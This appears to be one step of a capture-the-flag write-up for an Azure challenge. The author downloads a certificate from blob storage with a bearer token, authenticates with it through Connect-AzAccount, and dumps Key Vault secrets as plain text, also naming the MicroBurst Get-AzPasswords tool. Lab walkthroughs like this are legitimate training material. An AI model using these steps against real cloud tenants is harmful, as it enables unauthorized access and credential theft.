Flag 8

Continuing where I left off from Flag 7, I retrieved the LORRI-Cert.txt

Request

curl --location 'https://coresat.blob.core.windows.net/datahandling/LORRI-Cert.txt' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'

Response

I saved the response to a file, and opening it using notepad shows a bunch of base64 encoded value. As the file name suggest that its some kind of certificate, more googling needs to be done.

The article from Azure shows how I can authenticate with the cert.

ChatGPT also helped out by giving step by step instructions.

The Application ID is retrieved from the current version of OSIRIS-REx.txt found in tsarray stroage account at Flag 2.

Import-Certificate -FilePath C:\Users\Edwin\Desktop\cert.pfx -CertStoreLocation Cert:\CurrentUser\My
Get-ChildItem -Path Cert:\CurrentUser\My
Connect-AzAccount -CertificateThumbprint "208AC4D5170A93061432E06C16F573E776E6180C" -SubscriptionId "7b9bd916-8bd2-4446-9678-8531ef663edb" -ApplicationId "6de8103e-049a-4f88-9abf-41099a79ca53" -TenantId "5f487283-b88e-4ade-8035-7bcaac4156b3"

Running the Get-AzResource shows that I have access to an Azure Key Vault.

Now, I can either manually enumerate the Azure Key Vault, or use MicroBurst Get-AzPasswords to list the key vault secrets.

Get-AzKeyVault
Get-AzKeyVaultSecret -VaultName cubesat

Get-AzKeyVaultSecret -VaultName cubesat -Name Flag8 -AsPlainText

Flag 8 : DART spacecraft has entered final descent.

PreviousFlag 7 NextFlag 9

Last updated 1 year ago